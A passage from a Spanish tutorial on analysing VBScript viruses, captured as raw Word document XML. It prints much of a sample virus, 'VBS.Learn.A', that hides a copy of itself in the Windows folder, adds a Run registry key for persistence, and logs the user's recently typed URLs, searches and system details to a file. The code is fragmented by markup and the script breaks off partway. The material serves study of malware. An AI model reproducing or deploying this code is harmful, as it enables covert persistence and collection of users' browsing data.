</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">una chorrada eso del “ok”, pues lo mas normal habría sido operar con un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>valor booleano</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Vemos también que no se trata de un código muy optimizado, y que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pueden</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> haber errores en él si en los InputBox ponemos comillas (fijaros bien y veréis el perque). Se concluye fácilmente pues que debió escribirlo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>algún aficionado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o alguien que estaba aprendiendo. Es normal pues, sacar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>este tipo de conclusiones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mirando el código: si el autor es o no novato, si intenta mejorar, si lo ha hecho rápido y corriendo, si tiene algún tipo de manía, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="206"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Analicemos en último lugar detalladamente, un script realizado ya con las normas básicas de orden, tratamiento de variables, y estilo:</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Option Explicit</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On Error Resume Next</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im Ws, Fso, F1_Texto, F1_Bucle, Nombre, Desktop, Unidad, DriveL, CaDrive, reg, Var1, Var2, Var3, X, W, N, A, P, P1, P2, P3, I, Tmp, Impresora, Buscar, Buscar1, Buscar2, Buscar3, Buscar4, Buscar5, B1, B2, B3, B4, B5, arcanex, ts, wibe, Leer, caracteres, MiCdn, c5, DelFile, Temporal, Var4, FiniteProgram</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Ws = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"WScript.Shell")</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Fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Scripting.FileSystemObject")</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reg = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00E62AD2">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-1628" w:right="48" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8502" w:type="dxa"/>
        <w:tblInd w:w="74" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="7" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8550"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="13950"/>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Nombre = "kernl.vbs"</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Temporal = "ffff299w_{17X410C8-A2X6-43X3-BW1B-F132R83M78K2}.tmp"</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initeProgram = Fa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unction Encriptar(F1_Text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or F1_Bucle = 1 To Len(F1_Text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Encriptar = Encriptar &amp; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Chr(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Asc(Mid(F1_Texto, F1_Bucle, 1)) Xor 5)</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Nex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Functio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unction Espacio(Unidad)</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DriveL = Fso.GetDrive(Fso.GetDriveName(Fso.GetAbsolutePathName(Unidad)))</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aDrive = CaDrive &amp; "Unidad "&amp; DriveL.VolumeName&amp; "("&amp; DriveL.DriveLetter&amp; "):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CaDrive = CaDrive &amp; "&lt;Disponible: " &amp; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>FormatNumber(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>DriveL.AvailableSpace/1024/1024, 3)-0 &amp; " Mbytes&gt;"</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CaDrive = CaDrive &amp; "&lt;Ocupado: " &amp; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>FormatNumber(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>DriveL.TotalSize/1024/1024, 3)FormatNumber(DriveL.AvailableSpace/1024/1024, 3) &amp; " Mbytes&g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spacio = CaDriv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Functio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Var1 = Fso.GetSpecialFolder(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opyFile ".\"&amp;Nombre, Var1&amp;"\"&amp;Nombre, True</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="4194"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Var2 = Fso.GetFile(Var1&amp;"\"&amp;Nombre) Var2.Attributes = 0 + 4 + 2 + 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238"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RegWrite</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel", Var1&amp;"\"&amp;Nombre, "REG_SZ"</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Desktop = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Ws.RegRead</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")</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Var3 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fso.CreateTextFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(Desktop&amp;"\Aviso.txt", True)</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3.WriteLine("Su PC ha sido infectado por voluntad propia con un virus residente que no provoca ningun daño y no se propaga a traves de ninguna linea de comunicación ni por medios de memoria extraible.") Var3.WriteBlankLines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Var3.WriteLine("El virus en cuestión es: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>VBS.Learn.A</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w: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3.WriteBlankLines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3.WriteLine("Como bien indica el nombre es un virus hecho con la finalidad aprender a combatirlos manualmente, sin ningun típo de riesgo para el usuario. El virus solo crea este archivo cada vez que se inicia Windows y otro en el que se guardan algunos datos no personales (como fondo de escritorio, fecha y hora de inicio de Windows...), que se actualiza periodicamente. Este segundo archivo deberá encontrarlo usted mismo, y no será enviado por medio del virus a nadie nunca.") Var3.WriteBlankLines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3.WriteLine("Aun así, el autor de este virus no se hace responsable de cualquier daño que pueda causar este virus en su PC, y recuerde que usted, y solo usted ha puesto en funcionamiento este virus.") Var3.WriteBlankLines 20</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="136"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Var3.WriteLine("Si </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>continua</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> leyendo este virus no le enseñará nada porque dice como se desactiva, solo baje si tiene problemas.") Var3.WriteBlankLines 2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Var3.WriteLine("Si usted no ha ejecutado este virus voluntariamente porque alguien lo distribuye </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malintencionadamente haga clic en ejecutar, escriba msconfig, haga clic en la pestaña de Inicio y desactive la opción Kernl. Luego reinicie su ordenador.")</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3.Clo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X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Control Panel\Desktop\Wallpaper")</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W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LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Versio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N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LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\VersionNumber")</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A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LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SubVersionNumber")</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P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Internet Explorer\Main\Start Pag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P1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Internet Explorer\TypedURLs\url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P2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Internet Explorer\TypedURLs\url2")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1147"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P3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Internet Explorer\TypedURLs\url3") I = reg.regRead ("HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version") Impresora = reg.regRead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HKEY_LOCAL_MACHINE\Config\0001\System\CurrentControlSet\Control\Print\Printers\Default")</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uscar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MRULis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uscar1 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Left(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Buscar,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1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amp;Buscar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Buscar2=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mid(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Buscar, 2,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2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amp;Buscar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Buscar3=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mid(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Buscar, 3,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3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amp;Buscar3)</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Buscar4=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mid(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Buscar, 4,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4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amp;Buscar4)</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Buscar5=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mid(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Buscar, 5,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5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amp;Buscar5)</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Var1 = Fso.GetSpecialFolder(0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="7812"/>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If Fso.FileExists(Var1&amp;"\"&amp;Nombre&amp;".dat") = False Then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="4376"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TextFile Var1&amp;"\"&amp;Nombre&amp;".dat", False End If</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="4349"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arcanex = Fso.GetFile(Var1&amp;"\"&amp;Nombre&amp;".dat") Set ts = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>arcanex.OpenAsTextStream</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(8)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238"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ts.Write</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "&lt; Registro VBS.Learn.A &gt;"&amp;VbCrLf&amp;"Iniciado &lt;"&amp;W&amp;" "&amp;N&amp;" "&amp;A&amp;"&gt; :   &lt;"&amp;Now&amp;"&gt;"&amp;VbCrLf&amp;"Fondo de escritorio: &lt;"&amp;X&amp;"&gt;"&amp;VbCrLf&amp;"Impresora predeterminada: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t;"&amp;Impresora&amp;"&gt;"&amp;VbCrLf&amp;Espacio("C:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>")&amp;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">VbCrLf&amp;"Pagina inicial de Internet Explorer &lt;"&amp;I&amp;"&gt;: </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lt;"&amp;P&amp;"&gt;"&amp;VbCrLf&amp;"Ultimas tres paginas web visitadas:"&amp;VbCrLf&amp;"&lt;"&amp;P1&amp;"&gt;&lt;"&amp;P2&amp;"&gt;&lt;"&amp;P3&amp;"&gt;"&amp;VbCrLf&amp;"Ultimas cinco busquedas realizadas en Windows: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2169"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amp;VbCrLf&amp;"&lt;"&amp;B1&amp;"&gt;&lt;"&amp;B2&amp;"&gt;&lt;"&amp;B3&amp;"&gt;&lt;"&amp;B4&amp;"&gt;&lt;"&amp;B5&amp;"&gt;"&amp;VbCrLf&amp;VbCrLf </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ts.Close</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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wibe = Fso.OpenTextFile(Var1&amp;"\"&amp;Nombre&amp;".dat", 1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="6465"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eer=wibe.ReadAll caracteres=len(Leer) If caracteres &gt; 55555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MiCdn = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Right(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
